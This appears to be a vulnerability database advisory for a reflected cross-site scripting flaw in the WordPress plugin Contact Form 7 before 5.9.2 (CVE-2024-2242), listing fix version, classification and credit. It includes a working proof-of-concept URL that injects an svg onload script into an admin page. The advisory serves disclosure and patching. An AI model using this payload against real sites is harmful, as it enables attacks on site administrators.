WordPress Plugin Vulnerabilities

Contact Form 7 < 5.9.2 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against administrators.

Proof of Concept

http://vulnerable-site.tld/wp-admin/admin.php?page=wpcf7&post=$FORMID&active-tab=1%22%3E%3Csvg%2Fonload%3Dalert%281%29%2F%2F%3E

Affects Plugins

Plugin icon
contact-form-7
Fixed in 5.9.2

References

CVE
CVE-2024-2242
URL
https://www.wordfence.com/threat-intel/vulnerabilities/id/d5bf4972-424a-4470-a0bc-7dcc95378e0e

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Asaf Mozes
Verified
Yes
WPVDB ID
1c070a2c-2ab0-43bf-b10b-6575709918bc

Timeline

Publicly Published
2024-03-13 (about 3 months ago)
Added
2024-03-13 (about 3 months ago)
Last Updated
2024-03-13 (about 3 months ago)

Other

Published
Title
Published
2018-03-08
Title
Import any XML or CSV File to WordPress <= 3.4.6 - Cross-Site Scripting (XSS)
Published
2022-12-20
Title
Metricool < 1.18 - Admin+ Stored XSS
Published
2024-03-25
Title
Astra < 4.6.9 - Contributor+ Stored XSS
Published
2023-04-24
Title
Tablesome < 1.0.9 - Reflected XSS
Published
2023-09-25
Title
Simple Posts Ticker < 1.1.6 - Contributor+ Stored XSS